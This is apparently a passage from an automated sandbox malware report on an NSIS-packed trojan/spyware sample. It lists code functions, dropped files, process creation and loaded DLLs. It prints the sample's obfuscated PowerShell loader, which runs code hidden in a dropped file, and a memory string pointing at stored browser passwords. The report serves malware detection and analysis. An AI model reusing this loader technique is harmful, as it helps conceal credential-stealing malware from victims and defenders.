          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A0CC011_2_234A0CC0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A28E011_2_234A28E0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A388011_2_234A3880
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A068011_2_234A0680
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A928111_2_234A9281
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A0CAF11_2_234A0CAF
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A54A011_2_234A54A0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234A22A011_2_234A22A0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BE34811_2_234BE348
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B050811_2_234B0508
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BE66811_2_234BE668
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B6C8811_2_234B6C88
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B7F4811_2_234B7F48
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BB14811_2_234BB148
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BCD6811_2_234BCD68
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B9B6811_2_234B9B68
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BDD0811_2_234BDD08
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B790811_2_234B7908
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BAB0811_2_234BAB08
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BF92811_2_234BF928
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BC72811_2_234BC728
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B952811_2_234B9528
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BEFC811_2_234BEFC8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B8BC811_2_234B8BC8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BBDC811_2_234BBDC8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BD9E811_2_234BD9E8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B75E811_2_234B75E8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BA7E811_2_234BA7E8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BE98811_2_234BE988
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BB78811_2_234BB788
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B858811_2_234B8588
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BD3A811_2_234BD3A8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B6FA811_2_234B6FA8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BA1A811_2_234BA1A8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BFC4811_2_234BFC48
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BCA4811_2_234BCA48
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B984811_2_234B9848
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B004011_2_234B0040
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B826811_2_234B8268
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BB46811_2_234BB468
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BF60811_2_234BF608
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BC40811_2_234BC408
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B920811_2_234B9208
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BAE1A11_2_234BAE1A
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B001211_2_234B0012
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BE02811_2_234BE028
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B7C2811_2_234B7C28
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BAE2811_2_234BAE28
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BFC3711_2_234BFC37
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BD6C811_2_234BD6C8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B72C811_2_234B72C8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BA4C811_2_234BA4C8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BF2E811_2_234BF2E8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BC0E811_2_234BC0E8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B8EE811_2_234B8EE8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B04F711_2_234B04F7
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BD08811_2_234BD088
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B9E8811_2_234B9E88
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B889811_2_234B8898
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BEC9811_2_234BEC98
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BECA811_2_234BECA8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234B88A811_2_234B88A8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234BBAA811_2_234BBAA8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234E230011_2_234E2300
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234E004011_2_234E0040
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234E076011_2_234E0760
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234EE96811_2_234EE968
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234E0E4811_2_234E0E48
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234E153011_2_234E1530
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234E1C1811_2_234E1C18
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234E22F111_2_234E22F1
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234E001211_2_234E0012
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234E075011_2_234E0750
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234E0E3811_2_234E0E38
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234E152111_2_234E1521
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234E1C0811_2_234E1C08
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_235E233711_2_235E2337
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_235E106011_2_235E1060
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_235E044811_2_235E0448
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll 1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
          Source: NDQ211216GM08.exe.bin.exe, 00000000.00000000.998476324.0000000000454000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameisogamies.exeDVarFileInfo$ vs NDQ211216GM08.exe.bin.exe
          Source: NDQ211216GM08.exe.bin.exeBinary or memory string: OriginalFilenameisogamies.exeDVarFileInfo$ vs NDQ211216GM08.exe.bin.exe
          Source: NDQ211216GM08.exe.bin.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/21@5/6
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,11_2_004034F7
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_00404AE1 GetDiskFreeSpaceW,MulDiv,0_2_00404AE1
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_00402210 CoCreateInstance,0_2_00402210
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeFile created: C:\Users\user\AppData\Local\Skakspillene144Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\nsd2A3.tmpJump to behavior
          Source: NDQ211216GM08.exe.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000204F7000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204A8000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204B8000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204C6000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: NDQ211216GM08.exe.bin.exeVirustotal: Detection: 63%
          Source: NDQ211216GM08.exe.bin.exeReversingLabs: Detection: 63%
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeFile read: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe "C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe"
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Nonalined.exe "C:\Users\user\AppData\Local\Temp\Nonalined.exe"
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Nonalined.exe "C:\Users\user\AppData\Local\Temp\Nonalined.exe"Jump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeSection loaded: mswsock.dllJump to behavior
